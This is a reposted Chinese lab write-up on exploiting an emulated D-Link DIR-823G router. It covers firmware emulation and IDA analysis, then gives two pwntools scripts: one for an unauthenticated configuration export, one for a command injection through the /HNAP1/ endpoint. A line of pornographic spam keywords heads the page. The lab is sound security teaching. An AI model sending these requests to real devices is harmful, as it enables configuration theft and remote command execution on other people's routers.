国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

某60物聯(lián)網(wǎng)安全之IoT漏洞利用實(shí)操1學(xué)習(xí)記錄

這篇具有很好參考價(jià)值的文章主要介紹了某60物聯(lián)網(wǎng)安全之IoT漏洞利用實(shí)操1學(xué)習(xí)記錄。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

物聯(lián)網(wǎng)安全


IoT漏洞利用實(shí)操1(邏輯漏洞)

實(shí)驗(yàn)?zāi)康?/h3>

學(xué)會(huì)使用fat模擬IoT設(shè)備固件
學(xué)會(huì)使用IDA分析設(shè)備固件內(nèi)服務(wù)程序的邏輯漏洞
學(xué)會(huì)使用pwntools與IoT設(shè)備服務(wù)交互并觸發(fā)漏洞

實(shí)驗(yàn)環(huán)境

操作機(jī):Ubuntu 20.04【用戶名:user 密碼:user】

實(shí)驗(yàn)工具

qemu
fat
binwalk
pwntools
IDA pro

實(shí)驗(yàn)原理

IoT 設(shè)備中可能存在各種漏洞,總結(jié)來(lái)說(shuō),這些漏洞可以被大體劃分為兩大類(lèi),一類(lèi)是內(nèi)存破壞型漏洞,另一類(lèi)則是邏輯漏洞。而在邏輯漏洞中,又以未授權(quán)訪問(wèn)漏洞和命令注入漏洞最為常見(jiàn)。
未授權(quán)訪問(wèn)漏洞可以理解為需要安全配置或權(quán)限認(rèn)證的地址、授權(quán)頁(yè)面存在缺陷導(dǎo)致非管理員的任意用戶可以直接訪問(wèn),從而引發(fā)重要權(quán)限可被操作、數(shù)據(jù)庫(kù)或設(shè)備內(nèi)存等敏感信息泄露。
命令注入漏洞是指由于設(shè)備內(nèi)服務(wù)程序?qū)τ脩籼峤坏臄?shù)據(jù)過(guò)濾不嚴(yán)格,導(dǎo)致惡意用戶可以通過(guò)構(gòu)造特殊命令字符串的方式,將數(shù)據(jù)提交至應(yīng)用程序中,并利用該方式執(zhí)行外部程序或系統(tǒng)命令實(shí)施攻擊,非法獲取數(shù)據(jù)或者設(shè)備信息等。

實(shí)驗(yàn)內(nèi)容

使用fat模擬IoT設(shè)備固件
進(jìn)行IoT設(shè)備未授權(quán)訪問(wèn)漏洞的利用
進(jìn)行IoT設(shè)備命令注入漏洞的利用

實(shí)驗(yàn)步驟

使用fat模擬IoT設(shè)備固件
本節(jié)實(shí)操課用來(lái)測(cè)試的設(shè)備是 Dlink DIR-823G ,首先利用 fat 工具將該設(shè)備的固件快速模擬運(yùn)行起來(lái)。依次輸入如下命令,進(jìn)入該工具的目錄,并利用該工具模擬固件文件 DIR823GA1_FW102B03.bin。
$ cd ~/firmware-analysis-toolkit
$ ./fat.py ~/Desktop/experiment2/DIR823GA1_FW102B03.bin
fat 工具會(huì)自動(dòng)解壓固件并修改內(nèi)核,然后再重新打包,最后利用 QEMU 對(duì)重新打包的固件模擬運(yùn)行,但是需要等待一段時(shí)間,由該工具自動(dòng)配置適合該路由設(shè)備的網(wǎng)卡和IP地址。

當(dāng)顯示如下圖所示的信息,則說(shuō)明已經(jīng)可以正常模擬運(yùn)行固件。
iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

按下回車(chē)鍵就會(huì)進(jìn)入 QEMU 模擬的終端,模擬的 Dlink DIR-823G 設(shè)備的地址為192.168.0.1。可以發(fā)現(xiàn)終端一直在不停的輸出信息,但是其實(shí)并不影響命令的輸入。

iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

可以在瀏覽器中訪問(wèn)該模擬設(shè)備的管理頁(yè)面進(jìn)行驗(yàn)證,顯示如下圖所示,表示模擬的路由器服務(wù)正常。

iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

進(jìn)行IoT設(shè)備未授權(quán)訪問(wèn)漏洞的利用
路由設(shè)備 Dlink DIR-823G 通過(guò) web 管理界面和用戶進(jìn)行交互,實(shí)際功能調(diào)用 cgi 實(shí)現(xiàn),但是其 web 服務(wù)程序 goahead 沒(méi)有相應(yīng) cgi 文件的權(quán)限校驗(yàn),使得非授權(quán)用戶也可以直接訪問(wèn)相應(yīng)功能的 cgi,對(duì)設(shè)備造成嚴(yán)重影響。

該設(shè)備存在如下未授權(quán)可以直接訪問(wèn)調(diào)用的 cgi:

/cgi-bin/ExportSettings.sh 導(dǎo)出配置文件(信息泄露)

/cgi-bin/upload_settings.cgi 導(dǎo)入配置文件(惡意篡改配置)

/cgi-bin/upload_firmware.cgi 上傳更新固件(惡意修改固件)

以未授權(quán)訪問(wèn) /cgi-bin/ExportSettings.sh 導(dǎo)出配置文件為例??梢韵仍谀M的路由器的管理頁(yè)面設(shè)置一個(gè)管理員用戶。
iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)
iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)
iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)
iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)
iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

退出該用戶帳號(hào)后,以匿名身份直接通過(guò)瀏覽器訪問(wèn) /cgi-bin/ExportSettings.sh,發(fā)現(xiàn)可以正常導(dǎo)出配置文件。

iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

或者可以直接利用如下 pwntools 腳本偽造一個(gè)訪問(wèn)路由設(shè)備 /cgi-bin/ExportSettings.sh 的 HTTP 請(qǐng)求,可以同樣獲取該設(shè)備的配置文件。

from pwn import *

context.log_level = 'debug'
io = remote('192.168.0.1', 80)

content = '''GET /cgi-bin/ExportSettings.sh HTTP/1.1\r
Host: 192.168.0.1\r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\r
Accept: */*\r
Accept-Encoding: gzip, deflate\r
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r
Connection: close\r
\r
'''

io.send(content)

io.recv(1000)
io.recv(1000)

io.close()

iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

進(jìn)行IoT設(shè)備命令注入漏洞的利用
路由設(shè)備 Dlink DIR-823G 的 web 服務(wù)程序 goahead 還存在命令注入漏洞,先通過(guò)命令 binwalk -Me ./DIR823GA1_FW102B03.bin 將其固件解包。
iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

進(jìn)入到解包后的固件根目錄 squashfs-root/bin/ 中,找到其web 服務(wù)程序 goahead ,通過(guò) file 命令可以查看其架構(gòu)為 MIPS。
iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

之后利用命令 wine ~/IDAPro7.5/ida.exe 打開(kāi) IDA,并通過(guò) IDA 加載將要分析的固件內(nèi)程序 goahead
iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

并按 G鍵打開(kāi)地址跳轉(zhuǎn)窗口,輸入 0x42383C,跳轉(zhuǎn)到漏洞函數(shù) sub_42383C。

iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

之后按F5鍵查看函數(shù) sub_42383C的反編譯代碼,不難看出存在命令注入漏洞。

iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

在函數(shù)名上按X鍵,通過(guò)交叉引用,逆向分析出該漏洞函數(shù)的觸發(fā)流為:

main -> sub_423F90 -> sub_42383C

通過(guò)sub_423F90函數(shù),可以分析出sub_42383C函數(shù)是訪問(wèn) /HNAP1 這個(gè) url 時(shí)對(duì)應(yīng)的處理函數(shù)。

16

在觸發(fā)該命令注入漏洞前,模擬該路由設(shè)備固件的終端內(nèi) web_mtn 目錄下,沒(méi)有 hack.txt 文件。
17

同時(shí),瀏覽器也無(wú)法訪問(wèn)該 hack.txt 文件。

iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

可以通過(guò)如下的 pwntools 腳本生成能夠觸發(fā)該命令注入漏洞的請(qǐng)求,該惡意請(qǐng)求執(zhí)行的命令為echo hacked_by_01dwang!!! > /web_mtn/hack.txt,即向設(shè)備的web頁(yè)面根目錄 web_mtn 目錄內(nèi)寫(xiě)入 hack.txt 文件。

from pwn import *

context.log_level = 'debug'
io = remote('192.168.0.1', 80)

content = '''POST /HNAP1/ HTTP/1.1\r
Host: 192.168.0.1\r
Content-Length: 54\r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\r
Content-Type: text/xml; charset=UTF-8\r
Accept: */*\r
SOAPAction: "http://purenetworks.com/HNAP1/Login"\r
Accept-Encoding: gzip, deflate\r
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r
Connection: close\r
\r
'`echo hacked_by_01dwang!!!!!!!! > /web_mtn/hack.txt`'
'''

io.send(content)

io.recv(1000)

io.close()

在通過(guò)腳本生成的惡意請(qǐng)求觸發(fā)該命令注入漏洞后,路由設(shè)備的終端內(nèi) web_mtn 目錄下,生成了 hack.txt 文件。
iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)

同時(shí),瀏覽器也可以訪問(wèn)該 hack.txt 文件。

iot設(shè)備漏洞,物聯(lián)網(wǎng),安全,學(xué)習(xí)文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-835947.html

到了這里,關(guān)于某60物聯(lián)網(wǎng)安全之IoT漏洞利用實(shí)操1學(xué)習(xí)記錄的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄

    某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄

    ` 學(xué)會(huì)使用python3的web3模塊 學(xué)會(huì)以太坊整數(shù)溢出漏洞分析及利用 Ubuntu18.04操作機(jī) python3 低版本Solidity整數(shù)是uint無(wú)符號(hào)類(lèi)型,若操作存在不安全行為,可能會(huì)產(chǎn)生溢出,通過(guò)分析代碼找到漏洞點(diǎn),實(shí)現(xiàn)整數(shù)溢出利用。 題目環(huán)境是測(cè)試鏈,所以需要本地與題目進(jìn)行交互,可使用

    2024年02月03日
    瀏覽(22)
  • 什么是物聯(lián)網(wǎng)?如何保護(hù)物聯(lián)網(wǎng)iot安全性

    什么是物聯(lián)網(wǎng)?如何保護(hù)物聯(lián)網(wǎng)iot安全性

    物聯(lián)網(wǎng)iot:物聯(lián)網(wǎng)(IoT)將生活中事物以網(wǎng)絡(luò)進(jìn)行連接,彼此交換信息。整個(gè)世界借由設(shè)備連接成一體。 對(duì)于消費(fèi)者而言,這意味著您可以在大洋彼岸遠(yuǎn)程調(diào)節(jié)家中的恒溫器。但是對(duì)企業(yè)而言,物聯(lián)網(wǎng)不僅創(chuàng)造了連接客戶和合作伙伴的新機(jī)會(huì),還能有效收集、存儲(chǔ)和分析海量

    2024年02月05日
    瀏覽(30)
  • 華為掃地僧:揭秘IoT+鴻蒙幫助企業(yè)突圍物聯(lián)網(wǎng)安全問(wèn)題

    摘要: 通過(guò)介紹物聯(lián)網(wǎng)安全架構(gòu)以及華為云IoT+鴻蒙端邊云協(xié)同安全實(shí)踐,意在通過(guò)華為云IoT+鴻蒙幫助企業(yè)解決物聯(lián)網(wǎng)安全問(wèn)題。 在本期#碼出未來(lái),與你同行#HDC.Cloud2023華為云開(kāi)發(fā)者社區(qū)系列直播之 《華為掃地僧揭秘IoT+鴻蒙幫助企業(yè)突圍物聯(lián)網(wǎng)安全問(wèn)題》 的主題直播中,華

    2024年02月11日
    瀏覽(20)
  • 忽略了物聯(lián)網(wǎng)(IoT)設(shè)備接入:物聯(lián)網(wǎng)設(shè)備的接入安全管理被忽視

    忽略了物聯(lián)網(wǎng)(IoT)設(shè)備接入:物聯(lián)網(wǎng)設(shè)備的接入安全管理被忽視

    標(biāo)題: 忽略了的物聯(lián)網(wǎng)(IoT)設(shè)備接入安全 引言 隨著物聯(lián)網(wǎng)技術(shù)的快速發(fā)展與普及應(yīng)用,越來(lái)越多的企業(yè)和個(gè)人開(kāi)始將各種智能設(shè)備和傳感器連接到互聯(lián)網(wǎng)上以優(yōu)化生產(chǎn)、提高生活質(zhì)量以及實(shí)現(xiàn)其他業(yè)務(wù)目標(biāo). 然而,由于缺乏有效的設(shè)備管理機(jī)制和安全的策略設(shè)計(jì),這些物聯(lián)網(wǎng)

    2024年02月22日
    瀏覽(25)
  • 踏入IOT安全世界:DIR-815路由器多次溢出漏洞分析復(fù)現(xiàn)

    在進(jìn)行IOT安全領(lǐng)域的學(xué)習(xí)和實(shí)踐中,經(jīng)典漏洞的復(fù)現(xiàn)是必不可少的一環(huán)。本文將介紹一個(gè)經(jīng)典漏洞,涉及到Binwalk、firmware-mod-kit、FirmAE等工具的使用,以及對(duì)DIR-815路由器中多次溢出漏洞的復(fù)現(xiàn)過(guò)程。 固件下載地址:https://legacyfiles.us.dlink.com/DIR-815/REVA/FIRMWARE/ 這個(gè)漏洞屬于經(jīng)典

    2024年03月26日
    瀏覽(19)
  • [車(chē)聯(lián)網(wǎng)安全自學(xué)篇] Car Hacking之關(guān)于IoT安全該如何入門(mén)?你必須知道的那些事「3萬(wàn)字詳解」

    [車(chē)聯(lián)網(wǎng)安全自學(xué)篇] Car Hacking之關(guān)于IoT安全該如何入門(mén)?你必須知道的那些事「3萬(wàn)字詳解」

    也許每個(gè)人出生的時(shí)候都以為這世界都是為他一個(gè)人而存在的,當(dāng)他發(fā)現(xiàn)自己錯(cuò)的時(shí)候,他便開(kāi)始長(zhǎng)大 少走了彎路,也就錯(cuò)過(guò)了風(fēng)景,無(wú)論如何,感謝經(jīng)歷 物聯(lián)網(wǎng),也稱為物聯(lián)網(wǎng)(IoT),代表可以連接到互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的設(shè)備和外圍設(shè)備的集合。這些設(shè)備有多種形狀和尺

    2024年02月04日
    瀏覽(23)
  • 【網(wǎng)絡(luò)安全】實(shí)操XSS訂單系統(tǒng)漏洞(利用盲打)

    博主昵稱:跳樓梯企鵝 博主主頁(yè)面鏈接:

    2024年01月23日
    瀏覽(22)
  • IOT(物聯(lián)網(wǎng))的七大通信協(xié)議

    IOT(物聯(lián)網(wǎng))的七大通信協(xié)議

    在物聯(lián)網(wǎng)協(xié)議中,我們一般分為兩大類(lèi),一類(lèi)是傳輸協(xié)議,一類(lèi)是通信協(xié)議。傳輸協(xié)議一般負(fù)責(zé)子網(wǎng)內(nèi)設(shè)備間的組網(wǎng)及通信;通信協(xié)議則主要是運(yùn)行在傳統(tǒng)互聯(lián)網(wǎng)TCP/IP協(xié)議之上的設(shè)備通訊協(xié)議,負(fù)責(zé)設(shè)備通過(guò)互聯(lián)網(wǎng)進(jìn)行數(shù)據(jù)交換及通信。 上圖為物聯(lián)網(wǎng)聯(lián)接的問(wèn)題空間,其中物

    2024年02月07日
    瀏覽(26)
  • 物聯(lián)網(wǎng)(IoT)的北向和南向

    物聯(lián)網(wǎng)(IoT)的北向和南向是指IoT系統(tǒng)中的數(shù)據(jù)流和通信方向,用于描述數(shù)據(jù)在系統(tǒng)中的傳輸和處理方向。以下是北向和南向在物聯(lián)網(wǎng)中的含義: 北向通信(Northbound Communication): 北向通信是指數(shù)據(jù)從底層物聯(lián)網(wǎng)設(shè)備(例如傳感器、終端設(shè)備)向上層系統(tǒng)傳輸?shù)耐ㄐ欧较颉?/p>

    2024年02月03日
    瀏覽(24)
  • 物聯(lián)網(wǎng)時(shí)代25大開(kāi)源IoT框架

    物聯(lián)網(wǎng)時(shí)代25大開(kāi)源IoT框架

    相當(dāng)長(zhǎng)一段時(shí)間以來(lái),互聯(lián)網(wǎng)一直被用來(lái)連接人類(lèi)并簡(jiǎn)化生活,這是21世紀(jì)初的啟示。今天,我們將討論各種物聯(lián)網(wǎng)框架 ——?現(xiàn)在,我們正在進(jìn)入一個(gè)基于互聯(lián)網(wǎng)技術(shù)的新世界,該世界不僅連接人,而且還連接事物。因此,我們稱其為物聯(lián)網(wǎng) (internet of things , IoT) 。 從人聯(lián)網(wǎng)

    2024年02月04日
    瀏覽(19)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包